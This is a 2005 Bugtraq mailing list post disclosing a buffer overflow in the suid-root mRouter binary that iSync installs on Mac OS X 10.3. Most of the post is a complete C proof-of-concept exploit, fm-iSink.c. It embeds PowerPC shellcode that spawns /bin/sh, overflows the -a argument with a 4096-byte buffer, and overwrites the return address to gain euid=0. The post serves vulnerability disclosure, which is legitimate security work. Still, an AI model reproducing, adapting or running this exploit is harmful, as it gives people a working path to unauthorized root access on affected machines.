Bugtraq mailing list archives
Mac OS X 10.3 iSync Privilege Escalation
From: Braden Thomas <bjthomas () usc edu>
Date: Sat, 22 Jan 2005 11:26:24 -0800
Hello everyone, a buffer overflow flaw has been discovered in the mRouter suid root binary installed by iSync in OS X 10.3 by default.
Program: /System/Library/SyncServices/SymbianConduit.bundle/Contents/ Resources/mRouter
Impact: Privilege Escalation (root access euid=0) Discovered: 12th January, 2005The mRouter binary's buffer overflow is triggered by using the -v and -a switches, and sending a buffer of 4096 bytes. Although I was unable to successfully exploit it because of the call to seteuid(501) early in the binary, nemo had no problem. He released a proof-of-concept that resolves this problem and results in euid=0.
Apple has been notified of this bug. nemo's Exploit: <------------ fm-iSink.c -----------> /* * fm-iSink.c * overflow in mRouter, suid binary used by iSync, on OSX <= 10.3.7 * * written by -( nemo @ felinemenace.org )- * * _,'| _.-''``-...___..--';) * /_ \'. __..-' , ,--...--''' * <\ .`--''' ` /' * `-';' ; ; ; * __...--'' ___...--_..' .;.' * fL (,__....----''' (,..--'' * * http://pulltheplug.org and http://felinemenace.org. * * Bug discovered by Braden Thomas. Exploit by nemo. * * -( need a challenge...? )- * -( http://www.pulltheplug.org )- */ #include <sys/types.h> #include <string.h> #include <unistd.h>#define VULNPROG "/System/Library/SyncServices/SymbianConduit.bundle/Contents/Resources/ mRouter"
#define MAXBUFSIZE 4096 char shellcode[] = // Shellcode by b-r00t, modified by nemo. "\x7c\x63\x1a\x79\x40\x82\xff\xfd\x39\x40\x01\xc3\x38\x0a\xfe\xf4" "\x44\xff\xff\x02\x39\x40\x01\x23\x38\x0a\xfe\xf4\x44\xff\xff\x02" "\x60\x60\x60\x60\x7c\xa5\x2a\x79\x7c\x68\x02\xa6\x38\x63\x01\x60" "\x38\x63\xfe\xf4\x90\x61\xff\xf8\x90\xa1\xff\xfc\x38\x81\xff\xf8" "\x3b\xc0\x01\x47\x38\x1e\xfe\xf4\x44\xff\xff\x02\x7c\xa3\x2b\x78" "\x3b\xc0\x01\x0d\x38\x1e\xfe\xf4\x44\xff\xff\x02\x2f\x62\x69\x6e" "\x2f\x73\x68"; char filler[MAXBUFSIZE]; int main(int ac, char **av) { unsigned int ret = 0xbffffffa - strlen(shellcode); char *args[] = { VULNPROG, "-v", "-a", filler, NULL }; char *env[] = { "TERM=xterm", shellcode, NULL }; memset(filler,(char)'A',sizeof(filler)); memcpy(filler+MAXBUFSIZE-5,&ret,4); execve(*args, args,env); return 0; }
Current thread:
- Mac OS X 10.3 iSync Privilege Escalation Braden Thomas (Jan 22)